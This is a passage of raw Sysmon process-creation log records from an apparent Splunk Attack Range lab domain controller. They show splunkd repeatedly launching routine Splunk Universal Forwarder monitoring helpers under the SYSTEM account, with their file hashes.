Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:22.016{A8622C2F-3FEE-6078-0C01-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:30:21.094{A8622C2F-3FED-6078-0B01-00000000AE01}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:26.356{A8622C2F-3FB6-6078-0A01-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:25.152{A8622C2F-3FB5-6078-0901-00000000AE01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:24.480{A8622C2F-3FB4-6078-0801-00000000AE01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:23.809{A8622C2F-3FB3-6078-0701-00000000AE01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:22.683{A8622C2F-3FB2-6078-0601-00000000AE01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:21.996{A8622C2F-3FB1-6078-0501-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:29:21.074{A8622C2F-3FB1-6078-0401-00000000AE01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:26.459{A8622C2F-3F7A-6078-0301-00000000AE01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:25.054{A8622C2F-3F79-6078-0201-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:24.475{A8622C2F-3F78-6078-0101-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:23.803{A8622C2F-3F77-6078-0001-00000000AE01}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:22.678{A8622C2F-3F76-6078-FF00-00000000AE01}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:21.990{A8622C2F-3F75-6078-FE00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:21.193{A8622C2F-3F75-6078-FD00-00000000AE01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:26.452{A8622C2F-3F3E-6078-FC00-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:25.171{A8622C2F-3F3D-6078-FB00-00000000AE01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:24.467{A8622C2F-3F3C-6078-FA00-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:23.795{A8622C2F-3F3B-6078-F900-00000000AE01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:22.670{A8622C2F-3F3A-6078-F800-00000000AE01}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:21.967{A8622C2F-3F39-6078-F700-00000000AE01}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:21.186{A8622C2F-3F39-6078-F600-00000000AE01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:26.426{A8622C2F-3F02-6078-F500-00000000AE01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:25.129{A8622C2F-3F01-6078-F400-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:24.348{A8622C2F-3F00-6078-F300-00000000AE01}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:23.769{A8622C2F-3EFF-6078-F200-00000000AE01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:22.644{A8622C2F-3EFE-6078-F100-00000000AE01}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:21.941{A8622C2F-3EFD-6078-F000-00000000AE01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:21.144{A8622C2F-3EFD-6078-EF00-00000000AE01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:26.398{A8622C2F-3EC6-6078-EB00-00000000AE01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:25.100{A8622C2F-3EC5-6078-EA00-00000000AE01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:24.428{A8622C2F-3EC4-6078-E900-00000000AE01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 